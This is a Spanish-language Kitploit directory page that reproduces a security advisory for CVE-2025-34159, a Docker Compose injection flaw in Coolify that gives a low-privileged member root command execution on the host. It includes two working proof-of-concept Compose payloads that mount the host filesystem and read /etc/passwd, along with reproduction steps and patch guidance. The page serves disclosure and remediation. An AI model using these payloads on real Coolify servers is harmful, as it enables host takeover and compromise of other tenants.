Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-34159 — A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on | Kitploit
Herramientas/GitHubGitHub/eyodav/cve-2025-34159
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCloud SecurityMisconfigurationRed Teaming
GitHubeyodav/cve-2025-34159

CVE-2025-34159

Ver Repositorio
hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on

Compartir

CVE-2025-34159: Inyección de Docker Compose en Coolify

Resumen de la vulnerabilidad

CampoValor
ID CVECVE-2025-34159
AfectaCoolify ≤ v4.0.0-beta.420.6
Corregido env4.0.0-beta.420.7
GravedadCrítica
CVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWECWE-78 (Inyección de comandos del SO), CWE-20 (Validación de entrada incorrecta)

Resumen ejecutivo

Existe una vulnerabilidad crítica de ejecución remota de código (RCE) en el flujo de despliegue de aplicaciones de Coolify. Esta falla permite que un miembro con bajos privilegios inyecte directivas arbitrarias de Docker Compose durante la creación o actualización de proyectos. Al definir un servicio malicioso que monta el sistema de archivos del host, un atacante puede lograr ejecución de comandos a nivel de root en el SO host, eludiendo por completo el aislamiento del contenedor.


Impacto de seguridad

  • Ejecución arbitraria de comandos en el sistema host con privilegios de root
  • Compromiso total del host incluyendo capacidad de leer/escribir archivos del sistema, establecer persistencia y realizar movimiento lateral
  • Violación de seguridad multiinquilino que potencialmente compromete a otros usuarios y equipos en la misma instancia
  • Omisión de controles de seguridad que hace irrelevantes las restricciones de acceso a la terminal de la UI (controles 403)

Detalles técnicos

Versiones afectadas

  • Versiones vulnerables: Coolify ≤ v4.0.0-beta.420.6
  • Versión parcheada: v4.0.0-beta.420.7

Vector de ataque

La vulnerabilidad existe en el flujo de despliegue de proyectos donde las configuraciones de Docker Compose proporcionadas por el usuario se procesan sin suficiente validación o sandboxing.


Prueba de concepto

PoC 1: Montaje raíz del host con ejecución de comandos

root@kitploit:~
version: '3.8'
services:
  poc-host-root:
    image: alpine:3.19
    tty: true
    volumes:
      - /:/host:rw
    command: >
      sh -c "
        echo '[*] Proof of RCE on host' &&
        echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
        whoami &&
        id &&
        uname -a &&
        head -n 5 /host/etc/passwd
      "

Resultado: Después del despliegue, /tmp/proof_rce.txt aparece en el sistema host, confirmando RCE con privilegios de root.

PoC 2: Escritura dirigida en ruta del host

root@kitploit:~
version: '3.8'
services:
  poc-host-write:
    image: alpine:3.19
    tty: true
    volumes:
      - /home/eyodav/PoC:/host
    command: >
      sh -c "
        set -e;
        mkdir -p /host &&
        echo '[*] Writing PoC file to host mount...' &&
        echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
        cd /host &&
        pwd &&
        ls -la
      "

Pasos de reproducción

  1. Autentíquese como usuario de nivel miembro (no administrador)
  2. Cree o edite un proyecto en Coolify
  3. Proporcione una configuración maliciosa usando uno de los payloads de Docker Compose anteriores
  4. Despliegue el proyecto
  5. Verifique la explotación comprobando artefactos en el lado del host (ej., /tmp/proof_rce.txt) o revisando la salida de comandos en los registros de despliegue

Acciones inmediatas

  1. Actualice inmediatamente a Coolify v4.0.0-beta.420.7 o posterior
  2. Revise los proyectos existentes en busca de configuraciones de Docker Compose potencialmente maliciosas

Referencias

  • Patch/Release Notes: https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.420.7
  • Advisory/PoC Repository: https://github.com/Eyodav/CVE-2025-34159
Descargar herramienta